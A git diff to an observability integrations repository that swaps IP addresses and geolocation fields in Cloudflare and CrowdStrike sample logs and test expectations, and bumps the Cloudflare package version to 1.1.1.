@@ -325,29 +330,32 @@ }, "client": { "geo": { - "continent_name": "Asia", - "country_name": "South Korea", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 4766, + "number": 29518, "organization": { - "name": "Korea Telecom" + "name": "Bredband2 AB" } }, - "address": "222.97.65.242", + "address": "89.160.20.156", "port": 0, "bytes": 5324, - "ip": "222.97.65.242" + "ip": "89.160.20.156" }, "event": { "duration": 63000000, - "ingested": "2021-08-10T07:34:12.277495700Z", - "original": "{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"222.97.65.242\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.
4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"1.2.3.4\",\"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", + "ingested": "2021-12-09T13:36:03.427511200Z", + "original": 
"{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"89.160.20.156\",\"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginRespon
seBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:02:38.812Z", "end": "2021-07-08T14:02:38.875Z", @@ -370,37 +378,37 @@ { "server": { "bytes": 2066, - "address": "7.8.9.1", - "ip": "7.8.9.1" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "destination": { "bytes": 2066, - "address": "7.8.9.1", - "ip": "7.8.9.1" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Portland", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.7052, - "lat": 45.461 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 30629, + "number": 29518, "organization": { - "name": "Lewis \u0026 Clark College" + "name": "Bredband2 AB" } }, - "address": "149.175.108.201", + "address": "89.160.20.156", "port": 61593, "bytes": 2520, - "ip": "149.175.108.201" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { 
@@ -511,27 +519,27 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Portland", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.7052, - "lat": 45.461 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 30629, + "number": 29518, "organization": { - "name": "Lewis \u0026 Clark College" + "name": "Bredband2 AB" } }, - "address": "149.175.108.201", + "address": "89.160.20.156", "port": 61593, "bytes": 2520, - "ip": "149.175.108.201" + "ip": "89.160.20.156" }, "tls": { "cipher": "AEAD-AES128-GCM-SHA256", 
@@ -540,8 +548,8 @@ }, "event": { "duration": 8000000, - "ingested": "2021-08-10T07:34:12.277506500Z", - "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"149.175.108.201\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"7.8.9.1\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerSta
tus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", + "ingested": "2021-12-09T13:36:03.427515700Z", + "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"89.160.20.156\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRule
Message\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:24:24.676Z", "end": "2021-07-08T14:24:24.684Z", diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 47e12f54c0f..0982fefd357 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,6 +1,6 @@ name: cloudflare title: Cloudflare -version: 1.1.0 +version: 1.1.1 release: ga description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration diff --git a/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log b/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log index 6a811c1efb2..87070601c11 100644 --- a/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log +++ b/packages/crowdstrike/_dev/deploy/docker/sample_logs/falcon-sample.log @@ -71,7 +71,7 @@ }, "event": { "UserId": "first.last@company.com", - "UserIp": "165.225.220.184", + "UserIp": "67.43.156.15", "OperationName": "saml2Assert", "ServiceName": "Crowdstrike Authentication", "Success": true, diff --git a/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log b/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log index d2fe20312a9..0d410547d63 100644 --- a/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log +++ b/packages/crowdstrike/_dev/deploy/docker/sample_logs/fdr-sample.log 
@@ -1,124 +1,124 @@ -{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"208.210.242.193","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"208.254.115.95","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"ff88:1:1:ffff:fa2d:c0ff:fe6f:70a0","RemoteAddressIP6":"ff88:1:1:ffff:1014:ce99:9b06:ab12","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"208.126.205.223","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"208.130.207.129","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"208.49.81.196","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"208.24.129.49","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"208.230.0.2","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.30.0.2","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"208.215.150.206","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"208.187.110.246","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"208.194.125.248","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"208.238.3.157","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"208.24.230.3","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} -{"LocalAddressIP4":"208.230.137.65","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"208.254.169.254","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"208.231.69.37","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:6c9e:e0ff:fe1f:6d7d","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"208.203.151.21","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"208.169.10.84","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"208.231.69.37","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"208.187.110.246","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"208.223.60.11","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"208.208.21.205","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 